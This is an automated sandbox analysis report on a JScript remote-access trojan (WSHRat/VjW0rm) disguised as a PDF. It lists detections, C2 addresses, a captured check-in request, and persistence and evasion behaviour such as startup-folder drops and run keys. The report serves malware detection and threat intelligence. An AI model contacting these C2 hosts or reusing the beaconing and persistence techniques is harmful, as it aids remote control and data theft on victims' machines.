Windows Analysis Report
34003198.pdf.js

Overview

General Information

Sample name:	34003198.pdf.js
Analysis ID:	1428759
MD5:	6812d6fba47adabb337563ca20fa84f8
SHA1:	2ab5b312c71f2a60d53c16fad7690291ea6d5bb0
SHA256:	6ac96e55099f4737d755e8caa4a03a4ad47faec1e7d133c3eb67c9a7057cd574
Tags:	jsVjw0rm
Infos:

Detection

WSHRat, VjW0rm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected WSHRat

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Sigma detected: Drops script at startup location

Sigma detected: Register Wscript In Run Key

Sigma detected: VjW0rm

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected VjW0rm

Yara detected WSHRAT

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious names

Drops script or batch files to the startup folder

Potential malicious VBS/JS script found (suspicious encoded strings)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious Parent Double Extension File Execution

Sigma detected: WScript or CScript Dropper

Sigma detected: WScript or CScript Dropper - File

Uses an obfuscated file name to hide its real file extension (double extension)

Uses known network protocols on non-standard ports

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript called in batch mode (surpress errors)

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Found WSH timer for Javascript or VBS script (likely evasive script)

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

Sigma detected: Script Initiated Connection

Sigma detected: Startup Folder File Write

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Houdini, WSHRAT	Houdini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.	No Attribution	http://blog.morphisec.com/hworm-houdini-aka-njrat http://blogs.360.cn/post/analysis-of-apt-c-37.html https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini

Name	Description	Attribution	Blogpost URLs	Link
Vjw0rm	VJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm).	No Attribution	https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics https://bazaar.abuse.ch/browse/signature/Vjw0rm/ https://community.riskiq.com/article/24759ad2 https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf	https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm

Signatures

AV Detection

Found malware configuration

Source: amsi64_2316.amsi.csv

Malware Configuration Extractor: VjW0rm {"C2 url": "http://jemyy.theworkpc.com:5401/Vre"}

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49730 -> 109.248.151.106:5401
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49731 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49732 -> 109.248.151.106:5401
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49733 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49739 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49740 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49741 -> 109.248.151.106:5401
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49742 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49743 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49744 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49745 -> 109.248.151.106:5401
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49746 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49747 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4:49748 -> 109.248.151.106:5401
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49749 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49750 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49751 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49752 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49754 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49755 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49756 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49757 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49758 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49759 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49760 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49761 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49762 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49763 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49764 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49765 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49766 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49767 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49768 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49769 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49770 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49771 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49772 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49773 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49774 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49775 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49776 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49777 -> 94.156.71.108:1604
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49778 -> 94.156.71.108:1604

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 94.156.71.108 1604
Source: C:\Windows\System32\wscript.exe	Network Connect: 109.248.151.106 5401			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://jemyy.theworkpc.com:5401/Vre

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 5401
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 1604
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 1604

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.4:49730 -> 109.248.151.106:5401
Source: global traffic	TCP traffic: 192.168.2.4:49731 -> 94.156.71.108:1604

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TERASYST-ASBG TERASYST-ASBG
Source: Joe Sandbox View	ASN Name: DATACLUBLV DATACLUBLV

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.71.108

Source: unknown

DNS traffic detected: queries for: jemyy.theworkpc.com

Source: unknown

HTTP traffic detected: POST /Vre HTTP/1.1Accept: */*User-Agent: JUNE_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: jemyy.theworkpc.com:5401Content-Length: 0Connection: Keep-AliveCache-Control: no-cache

Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108/
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108/&
Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108/3a
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108/BootDeve
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108/nPrevention_Q
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-ready
Source: wscript.exe, 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895295189.0000020BE1FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-ready.mui
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-ready;M
Source: wscript.exe, 00000006.00000003.2074574369.00000221C11C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readyB
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readyS
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readyT
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readyY
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readybM
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readykM
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readymM
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.71.108:1604/is-readyng
Source: wscript.exe, 00000002.00000003.1894678392.0000020BE1D20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895231999.0000020BE1D22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected WSHRAT

Source: Yara match	File source: amsi64_4108.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3168.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_3052.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_2108.amsi.csv, type: OTHER
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR

System Summary

Potential malicious VBS/JS script found (suspicious encoded strings)

Source: 34003198.pdf.js

Initial sample: Suspicious string win32_ D2LUMZJF

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}	Jump to behavior

Wscript called in batch mode (surpress errors)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
